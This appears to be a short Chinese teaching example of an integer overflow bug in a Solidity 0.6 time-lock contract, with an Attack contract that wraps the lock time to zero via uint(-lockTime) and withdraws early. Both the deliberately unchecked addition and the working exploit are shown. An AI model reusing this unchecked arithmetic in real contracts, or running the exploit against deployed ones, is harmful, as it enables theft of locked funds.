整数溢出漏洞

//SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract TimeLock{
    
    mapping(address => uint) public balacnces;
    mapping(address => uint) public lockTime;
    
    function deposit() public payable{
        
        balacnces[msg.sender] += msg.value;
        lockTime[msg.sender] = now + 1 weeks;
        
    }
    
    
    function increseLockTime(uint _secondsToIncrease) public{
        
        lockTime[msg.sender] += _secondsToIncrease;
        
        
    }
    
    
    function withdraw() public {
        
        require(balacnces[msg.sender] > 0, "insuffitiant funds");
        require(now > lockTime[msg.sender], "Lock time not expired");
        
        uint amount = balacnces[msg.sender];
        
        balacnces[msg.sender] = 0;
        
        (bool sent,) = msg.sender.call{value:amount}("");
        
        require(sent, "error");
        
    }
    
}



contract Attack{
    
    
    TimeLock tl;
    
    constructor(TimeLock _timelock) public{
        
        tl = _timelock;
        
    }
    
    function send() public payable{
        
        tl.deposit{value:msg.value}();
        
    }
    
    
    function attack() public payable returns (uint){
        
        tl.increseLockTime(
            
            uint(-tl.lockTime(address(this)))
            
            );
            
            tl.withdraw();
            return uint(now);
    }
    
    function testAttack() public payable{
        
        tl.withdraw();
    }
    
    fallback() external payable{}
    
}

通过整数溢出把时间锁调整为 0, 解除锁仓时间。